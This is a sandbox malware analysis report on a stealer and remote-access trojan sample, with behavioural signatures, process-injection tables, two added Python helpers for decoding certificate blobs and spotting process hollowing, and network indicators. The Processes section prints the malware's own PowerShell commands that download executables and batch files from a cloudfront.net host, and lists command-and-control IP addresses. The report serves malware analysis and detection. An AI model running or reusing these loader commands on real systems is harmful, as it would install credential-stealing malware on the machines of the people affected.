Malware Analysis Report

2025-01-02 05:50

Sample ID 240426-k2mpssdc2y
Target file
SHA256 1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784
Tags
sectoprat stealc zgrat rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784

Threat Level: Known bad

The file was found to be: Known bad.

Malicious Activity Summary

sectoprat stealc zgrat rat stealer trojan

SectopRAT payload

SectopRAT

ZGRat

Detect ZGRat V1

Stealc

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-26 09:05

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-26 09:05

Reported

2024-04-26 09:08

Platform

win7-20231129-en

Max time kernel

145s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2036 set thread context of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 636 set thread context of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe N/A

Modifies system certificate store

evasion spyware trojan

Note: both thumbprints below are written under the machine AuthRoot store, and the Blob for AD7E1C28B064EF8F6003402014C3D0E3370EB58A carries the friendly name "Starfield Class 2 Certification Authority", a public root. Windows adds public roots to AuthRoot on demand when a process first validates a TLS chain ending in a root that is not yet cached, so this signature on its own does not show the sample installing its own CA. Compare the thumbprints against a clean reference host's AuthRoot store before treating them as attacker-controlled.

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = [value elided] C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8
bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = [value elided] C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = [value elided] C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = [value elided] C:\Users\Admin\AppData\Local\Temp\file.exe N/A
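The Blob value is a serialized list of certificate context properties. Each record is a little-endian DWORD property ID, a DWORD that is 1 in every record here, a DWORD length and the data. In the long value above the records are, in order, the signature hash (ID 15), the friendly name as UTF-16LE (ID 11, "Starfield Class 2 Certification Authority"), root-program policies (83), enhanced key usage (9), key identifier (20), subject-name MD5 (29), SHA-1 thumbprint (3) and the DER certificate itself (32, 1043 bytes). The Python below is an added example, not part of the report: it decodes that layout and checks that the SHA-1 of the embedded certificate matches the registry key name, which is how an analyst tells a genuine root update from a key that was renamed or planted. The first two records are copied from the Blob above; the certificate that follows is a constructed placeholder because the real DER is too long to repeat, and PROP_NAMES, encode_property, parse_blob and thumbprint_matches are the example's own names.

```python
from __future__ import annotations
import hashlib
import struct

# CERT_*_PROP_ID values from wincrypt.h for the properties seen in the report's Blob.
PROP_NAMES = {
    3: "CERT_SHA1_HASH_PROP_ID",
    9: "CERT_ENHKEY_USAGE_PROP_ID",
    11: "CERT_FRIENDLY_NAME_PROP_ID",
    15: "CERT_SIGNATURE_HASH_PROP_ID",
    20: "CERT_KEY_IDENTIFIER_PROP_ID",
    29: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    32: "CERT_CERT_PROP_ID",
    83: "CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID",
}


def encode_property(prop_id: int, data: bytes) -> bytes:
    """One serialized record: DWORD id, DWORD 1, DWORD length, data."""
    return struct.pack("<III", prop_id, 1, len(data)) + data


def parse_blob(blob: bytes) -> dict[int, bytes]:
    """Walk the record list of a SystemCertificates\\...\\Blob value."""
    props, offset = {}, 0
    while offset < len(blob):
        if len(blob) - offset < 12:
            raise ValueError(f"truncated record header at offset {offset}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, offset)
        offset += 12
        if reserved != 1:
            raise ValueError(f"unexpected reserved value {reserved} in property {prop_id}")
        data = blob[offset:offset + length]
        if len(data) != length:
            raise ValueError(f"property {prop_id} claims {length} bytes, {len(data)} present")
        props[prop_id] = data
        offset += length
    return props


def friendly_name(props: dict[int, bytes]) -> str | None:
    raw = props.get(11)
    return None if raw is None else raw.decode("utf-16-le").rstrip("\x00")


def thumbprint_matches(key_name: str, props: dict[int, bytes]) -> bool:
    """Key name, stored SHA-1 property and SHA-1 of the DER cert must all agree."""
    cert = props.get(32)
    if cert is None:
        return False
    computed = hashlib.sha1(cert).hexdigest().upper()
    stored = props.get(3, b"").hex().upper()
    return computed == key_name.upper() == stored


# First two records copied verbatim from the report's Blob for
# AD7E1C28B064EF8F6003402014C3D0E3370EB58A: signature hash, then friendly name.
REPORT_PREFIX = bytes.fromhex(
    "0f000000 01000000 14000000 0f6aad4c3fe04619cdc8b2bd655aa1a26042e650"
    "0b000000 01000000 54000000"
    "53007400610072006600690065006c006400200043006c00610073007300200032002000"
    "430065007200740069006600690063006100740069006f006e00200041007500740068006f00"
    "72006900740079000000"
)
# Constructed stand-in for the 1043-byte DER certificate that follows in the real
# value; the SHA-1 record and the key name are derived from it so the blob is consistent.
DEMO_CERT = b"\x30\x82\x00\x0c" + b"constructed!"          # not a real certificate
DEMO_KEY_NAME = hashlib.sha1(DEMO_CERT).hexdigest().upper()
DEMO_BLOB = (REPORT_PREFIX
             + encode_property(3, hashlib.sha1(DEMO_CERT).digest())
             + encode_property(32, DEMO_CERT))


def describe(key_name: str, blob: bytes) -> dict:
    props = parse_blob(blob)
    return {
        "friendly_name": friendly_name(props),
        "properties": [PROP_NAMES.get(p, f"PROP_ID_{p}") for p in props],
        "cert_len": len(props.get(32, b"")),
        "thumbprint_ok": thumbprint_matches(key_name, props),
    }


if __name__ == "__main__":
    import pprint
    pprint.pprint(describe(DEMO_KEY_NAME, DEMO_BLOB))
```

To run it against the real value, paste the full Blob hex from the row above (both wrapped lines joined) into bytes.fromhex and pass the key name AD7E1C28B064EF8F6003402014C3D0E3370EB58A; thumbprint_ok should come back True for an untampered public root.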

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 3040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 3040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 3040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2668 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2668 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2668 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2668 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1860 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
PID 1860 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
PID 1860 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
PID 1860 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
PID 2668 wrote to memory of 1688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1860 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
PID 1860 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
PID 1860 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
PID 1860 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
PID 2464 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2464 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2464 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2464 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
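Read together, the SetThreadContext and WriteProcessMemory rows describe one process tree and two hand-offs in which a process both writes into a freshly created child and replaces its thread context: run.exe into cmd.exe, then that cmd.exe into MSBuild.exe. That pairing is the RunPE / process-hollowing pattern, and it leaves the final payload running inside a Microsoft-signed binary. A WriteProcessMemory row on its own is weaker evidence, because the sandbox attributes CreateProcess's own writes into a new child to the parent, so most of the rows above are just parent/child bookkeeping. The Python below is an added example, not part of the report: it parses the rows above (repeats collapsed) into a tree, flags the write-plus-set-context pairs, and prints the lineage of each hollowed process. Function names are the example's own.

```python
import re
from collections import defaultdict

# Rows copied from the report's "Suspicious use of WriteProcessMemory" and
# "Suspicious use of SetThreadContext" tables for behavioral1, repeats collapsed.
REPORT_ROWS = r"""
PID 3040 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 1072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1860 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2668 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1860 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
PID 2668 wrote to memory of 1688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1860 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
PID 2036 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 636 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1860 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
PID 2464 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 2036 set thread context of 636 N/A C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 636 set thread context of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"""

ROW_RE = re.compile(
    r"^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (\S+) (\S+)$")
WINDOWS_DIR = "C:\\Windows\\"


def parse_rows(text):
    """(src_pid, op, dst_pid, src_image, dst_image) tuples; op is 'write' or 'setctx'."""
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        src, op, dst, src_img, dst_img = m.groups()
        events.append((int(src), "write" if op.startswith("wrote") else "setctx",
                       int(dst), src_img, dst_img))
    return events


def build_tree(events):
    """Parent map and PID->image map. The first process that writes into a PID is
    taken as its parent, since the sandbox logs CreateProcess's writes into the
    new child as WriteProcessMemory; this is a proxy for the real process tree."""
    parent, images = {}, {}
    for src, op, dst, src_img, dst_img in events:
        images.setdefault(src, src_img)
        images.setdefault(dst, dst_img)
        if op == "write":
            parent.setdefault(dst, src)
    return parent, images


def lineage(parent, pid):
    """Ancestor chain from the root process down to pid."""
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return chain[::-1]


def hollowing_candidates(events):
    """Same source PID both writing into a target and replacing its thread context.
    Returns (src, dst, dst_image, dst_is_windows_binary) sorted by PID."""
    ops, image = defaultdict(set), {}
    for src, op, dst, _, dst_img in events:
        ops[(src, dst)].add(op)
        image[(src, dst)] = dst_img
    return sorted((s, d, image[(s, d)], image[(s, d)].startswith(WINDOWS_DIR))
                  for (s, d), seen in ops.items() if {"write", "setctx"} <= seen)


def render_tree(parent, images):
    """Indented text tree, one line per PID, roots first."""
    children = defaultdict(list)
    for child, par in parent.items():
        children[par].append(child)
    lines = []

    def walk(pid, depth):
        lines.append(f"{'  ' * depth}{pid} {images[pid]}")
        for c in sorted(children[pid]):
            walk(c, depth + 1)

    for root in sorted(p for p in images if p not in parent):
        walk(root, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    evts = parse_rows(REPORT_ROWS)
    par, imgs = build_tree(evts)
    print(render_tree(par, imgs))
    for s, d, img, lolbin in hollowing_candidates(evts):
        print(f"hollowing: {s} -> {d} ({img}){' [Windows binary]' if lolbin else ''}")
        print("  lineage:", " > ".join(map(str, lineage(par, d))))
```

On these rows the tree has a single root, file.exe (PID 3040), and both hollowing candidates target binaries under C:\Windows, so a detection that only looks at the image name of the process making network connections would see cmd.exe and MSBuild.exe rather than the dropped run.exe.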

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst199A.tmp\load.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=28381000 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe

"C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"

C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe

"C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

Network

Country Destination Domain Proto
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
